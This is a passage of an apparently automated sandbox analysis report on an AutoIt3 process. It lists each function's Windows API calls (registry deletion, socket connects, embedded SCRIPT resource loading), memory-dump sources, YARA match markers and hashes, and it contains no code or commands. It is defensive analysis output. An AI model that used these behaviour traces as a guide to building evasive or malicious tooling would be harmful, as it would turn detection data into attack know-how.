                                      • Opcode ID: 686cf71b05d247becb94974c0a332e14df9583e68d194cd5e0cd04ef7f9fc0bc
                                      • Instruction ID: a8eb605c981cda775a32bcfc59d94a334dbe2b96df673c1939b977c7161b383d
                                      • Opcode Fuzzy Hash: 686cf71b05d247becb94974c0a332e14df9583e68d194cd5e0cd04ef7f9fc0bc
                                      • Instruction Fuzzy Hash: 8E411775A08209EFDB20EF54D884EAABBB9FF05314F148129E959E7250D778ED50CFA0
                                      Function 00881602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00881631
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088165B
                                      • FreeLibrary.KERNEL32(00000000), ref: 00881712
                                        • Part of subcall function 00881602: RegCloseKey.ADVAPI32(?), ref: 00881678
                                        • Part of subcall function 00881602: FreeLibrary.KERNEL32(?), ref: 008816CA
                                        • Part of subcall function 00881602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008816ED
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 008816B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: cb362f0d330865a3006ca5360d9eb4f7336f991bf44ba336de2b0634c7f52d3d
                                      • Instruction ID: a5e9fb3b54b2bec9e9a3c8625dac59ae23767746673768c1322691627de0ba0b
                                      • Opcode Fuzzy Hash: cb362f0d330865a3006ca5360d9eb4f7336f991bf44ba336de2b0634c7f52d3d
                                      • Instruction Fuzzy Hash: 7231F9B1A01109BFEF15EB94DC89AFEB7BCFB08301F14016AE515E2150EB749E469BA4
                                      Function 008868F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00886911
                                      • GetWindowLongW.USER32(00EA5FF8,000000F0), ref: 00886944
                                      • GetWindowLongW.USER32(00EA5FF8,000000F0), ref: 00886979
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008869AB
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008869D5
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008869E6
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00886A00
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 04dc0c65eaa4d8bd84124b2ca6f05bdac9334fd8805211f6b3e692e390a9e3f5
                                      • Instruction ID: f35e13cf3e3a39c2faf2097d5f112e3080ec04ea2ab4f36539703f8c4468b806
                                      • Opcode Fuzzy Hash: 04dc0c65eaa4d8bd84124b2ca6f05bdac9334fd8805211f6b3e692e390a9e3f5
                                      • Instruction Fuzzy Hash: E9312071604250AFDB21EF18DC88F643BE5FB4A311F1901A4FA24CB2A2DB72AC60DF41
                                      Function 0085E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E2CA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E2F0
                                      • SysAllocString.OLEAUT32(00000000), ref: 0085E2F3
                                      • SysAllocString.OLEAUT32(?), ref: 0085E311
                                      • SysFreeString.OLEAUT32(?), ref: 0085E31A
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085E33F
                                      • SysAllocString.OLEAUT32(?), ref: 0085E34D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 4abf7ebf66d5cb32a6ce7453a7ffcee3dacd34159940f052036608019f1eefc3
                                      • Instruction ID: 16de1e48f520f188e22fffd12090cde5ee6d077fe239086fdc33650fca5498b9
                                      • Opcode Fuzzy Hash: 4abf7ebf66d5cb32a6ce7453a7ffcee3dacd34159940f052036608019f1eefc3
                                      • Instruction Fuzzy Hash: DE21A37660021DAF9F14EFA8DC88CBB73ACFB08365B088126FE54DB251D670AD458B64
                                      Function 0087685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00878475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008768B1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008768C0
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008768F9
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00876902
                                      • WSAGetLastError.WSOCK32 ref: 0087690C
                                      • closesocket.WSOCK32(00000000), ref: 00876935
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0087694E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      • Opcode ID: 1e79d312ccd00f601e50b7061997cac321827fa9c71168449af8aefd22bf0f41
                                      • Instruction ID: a9f1049ebefa6dddc0d6dfd2d6414486c0d235553c479cf029a0cf23a29a842a
                                      • Opcode Fuzzy Hash: 1e79d312ccd00f601e50b7061997cac321827fa9c71168449af8aefd22bf0f41
                                      • Instruction Fuzzy Hash: 21318471600618AFDB10AF64CC85BBE7BA9FF44765F048029FD09E7295DB74EC148BA2
                                      Function 0085E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E3A5
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E3CB
                                      • SysAllocString.OLEAUT32(00000000), ref: 0085E3CE
                                      • SysAllocString.OLEAUT32 ref: 0085E3EF
                                      • SysFreeString.OLEAUT32 ref: 0085E3F8
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085E412
                                      • SysAllocString.OLEAUT32(?), ref: 0085E420
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 3a3dccfb36da2f62191684efd98cdca679d21b19f6b53e4ea20ca39e71260d64
                                      • Instruction ID: dadb1637478c5c268e904cf71ec406a8a55beb7665a56613791c8028a36a7e66
                                      • Opcode Fuzzy Hash: 3a3dccfb36da2f62191684efd98cdca679d21b19f6b53e4ea20ca39e71260d64
                                      • Instruction Fuzzy Hash: 76218836605108AF9F14AFA8DC88CAE77ECFB08365B048165FD05CB261D670ED458B64
                                      Function 0085FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: 08b9cd69920682d37ad2cf18743b07d47149fc4c9c2ea75e5b43418f00b63f92
                                      • Instruction ID: f3c1b0169f6f2ebf144232e80e9a4ec22bd5d6a5207a5fac5f8018d6c2f96d6f
                                      • Opcode Fuzzy Hash: 08b9cd69920682d37ad2cf18743b07d47149fc4c9c2ea75e5b43418f00b63f92
                                      • Instruction Fuzzy Hash: 1B21493210012566D731BA28AC07EAB7398FF51701F544436FE46CE1E3E7A5AECA8296
                                      Function 00887BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00887C57
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00887C64
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00887C6F
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887C7E
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00887C8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: c37db2d5d4f212b29b130dfaf5af6e46b0429b860ce71f9589ff2cbdf7cf6ce7
                                      • Instruction ID: 30ada5ba1efc834ea8ec20ff8c2bed43067ceb16dd5a9c0cf858f8891cff60ac
                                      • Opcode Fuzzy Hash: c37db2d5d4f212b29b130dfaf5af6e46b0429b860ce71f9589ff2cbdf7cf6ce7
                                      • Instruction Fuzzy Hash: 66115EB2150219BEEF159F64CC85EE77F6EFF08798F114115BA08A6190CB72AC21DBA4
                                      Function 03D192C8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,03D19395), ref: 03D192F7
                                      • GetLastError.KERNEL32(WS2_32.DLL,00000000,03D19395), ref: 03D1930A
                                      • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 03D1935B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressErrorLastLibraryLoadProc
                                      • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                      • API String ID: 3511525774-1314211545
                                      • Opcode ID: 1f9f78678458f3f2026c90a1b63dd3c8a0a7480bf961aa4056ee509896e01c53
                                      • Instruction ID: 47d437220a1b047f97c3476065d469977310b26e7227689f7988a0540c448f38
                                      • Opcode Fuzzy Hash: 1f9f78678458f3f2026c90a1b63dd3c8a0a7480bf961aa4056ee509896e01c53
                                      • Instruction Fuzzy Hash: 26219D7AE04304FFCB14EFB4E960A9EB7B8EB28310F014469E415D7784D731AA10EB90
                                      Function 00869ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00850817,?,?,00000000,00000000), ref: 00869EE8
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00850817,?,?,00000000,00000000), ref: 00869EFF
                                      • LoadResource.KERNEL32(?,00000000,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14), ref: 00869F0F
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14), ref: 00869F20
                                      • LockResource.KERNEL32(00850817,?,?,00850817,?,?,00000000,00000000,?,?,?,?,?,?,00814A14,00000000), ref: 00869F2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: f9b82c53bf84982e223cbb8091237a12a65ec09103aa047a5736282e3d83c1f2
                                      • Instruction ID: e8a8f6c8e3cd5c31f2f55d133c7f81b8bfdc1c2de196b5f543c6aedec4e26933
                                      • Opcode Fuzzy Hash: f9b82c53bf84982e223cbb8091237a12a65ec09103aa047a5736282e3d83c1f2
                                      • Instruction Fuzzy Hash: 1C115771200701AFEB229B65DC48F277BBDFBC5B11F258269F949D62A0DB71EC04CA60
                                      Function 00829D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __init_pointers.LIBCMT ref: 00829D16
                                        • Part of subcall function 008233B7: EncodePointer.KERNEL32(00000000), ref: 008233BA
                                        • Part of subcall function 008233B7: __initp_misc_winsig.LIBCMT ref: 008233D5
                                        • Part of subcall function 008233B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0082A0D0
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0082A0E4
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0082A0F7
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0082A10A
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0082A11D
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0082A130
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0082A143
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0082A156
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0082A169
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0082A17C
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0082A18F
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0082A1A2
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0082A1B5
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0082A1C8
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0082A1DB
                                        • Part of subcall function 008233B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0082A1EE
                                      • __mtinitlocks.LIBCMT ref: 00829D1B
                                      • __mtterm.LIBCMT ref: 00829D24
                                        • Part of subcall function 00829D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00829D29,00827EFD,008BCD38,00000014), ref: 00829E86
                                        • Part of subcall function 00829D8C: _free.LIBCMT ref: 00829E8D
                                        • Part of subcall function 00829D8C: DeleteCriticalSection.KERNEL32(008C0C00,?,?,00829D29,00827EFD,008BCD38,00000014), ref: 00829EAF
                                      • __calloc_crt.LIBCMT ref: 00829D49
                                      • __initptd.LIBCMT ref: 00829D6B
                                      • GetCurrentThreadId.KERNEL32 ref: 00829D72
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                      • String ID:
                                      • API String ID: 3567560977-0
                                      • Opcode ID: 54cfeeccca1082c6b68a8f354b95ed6e38195076c17f57fd03fad194b8199225
                                      • Instruction ID: 397ffb701bdc857fec2ade851f81b222416fcd3ab3c95b31e104250521343795
                                      • Opcode Fuzzy Hash: 54cfeeccca1082c6b68a8f354b95ed6e38195076c17f57fd03fad194b8199225
                                      • Instruction Fuzzy Hash: 81F06D3290A731AAE6347B78BC0378A2AD4FF41770F21061AF4E4D51D3EF2089C25592
                                      Function 03CC41E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE,?,?,?,?,?,?,?,03CC435A,03CC2B1F), ref: 03CC421D
                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE,?,?,?,?,?,?,?,03CC435A), ref: 03CC4223
                                      • GetStdHandle.KERNEL32(000000F5,03CC426C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE), ref: 03CC4238
                                      • WriteFile.KERNEL32(00000000,000000F5,03CC426C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,03CC42AE), ref: 03CC423E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileHandleWrite
                                      • String ID: Error$Runtime error at 00000000
                                      • API String ID: 3320372497-2970929446
                                      • Opcode ID: 44f4d8473269ebd51ef61b097cc84371900ccee8ead1e94c652104f26af33de7
                                      • Instruction ID: a5b1db8c38bb53d6f1a01b97702e1f821062af1c56882f37011e9dd0e1f98aa0
                                      • Opcode Fuzzy Hash: 44f4d8473269ebd51ef61b097cc84371900ccee8ead1e94c652104f26af33de7
                                      • Instruction Fuzzy Hash: B7F096B96A43C439E735F6A29D16F9925584B64B15F18420DF270EC4CB86A862C4A621
                                      Function 008241B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00824282,?), ref: 008241D3
                                      • GetProcAddress.KERNEL32(00000000), ref: 008241DA
                                      • EncodePointer.KERNEL32(00000000), ref: 008241E6
                                      • DecodePointer.KERNEL32(00000001,00824282,?), ref: 00824203
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: 9642248528500c988bb3788565fd735e41c8d777cc07b462d8b04400dd8d4303
                                      • Instruction ID: 1151f6096dcf1fd779d66064573ce3005379442bad9dee054c2b4ec06413aaf5
                                      • Opcode Fuzzy Hash: 9642248528500c988bb3788565fd735e41c8d777cc07b462d8b04400dd8d4303
                                      • Instruction Fuzzy Hash: 16E01270A90711AFEF122FB0EC4DF083AB5FB20B06FA8442AB411D52E4CBB960C49F10
                                      Function 0082428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008241A8), ref: 008242A8
                                      • GetProcAddress.KERNEL32(00000000), ref: 008242AF
                                      • EncodePointer.KERNEL32(00000000), ref: 008242BA
                                      • DecodePointer.KERNEL32(008241A8), ref: 008242D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: f412be70ec603c5c982ed222e9203bf4666668ad1bbf0c40cf6d102ed422bebc
                                      • Instruction ID: b18f276bc8d9ab690cd2fc6427bee0491cce4ad25baa76135758871a561f0f1c
                                      • Opcode Fuzzy Hash: f412be70ec603c5c982ed222e9203bf4666668ad1bbf0c40cf6d102ed422bebc
                                      • Instruction Fuzzy Hash: 53E09970A90B00EFEE11AB62AD0DF443AB4FB00B42F58011BF001E52A0CBF966849E20
                                      Function 0080218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 008021B8
                                      • GetWindowRect.USER32(?,?), ref: 008021F9
                                      • ScreenToClient.USER32(?,?), ref: 00802221
                                      • GetClientRect.USER32(?,?), ref: 00802350
                                      • GetWindowRect.USER32(?,?), ref: 00802369
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
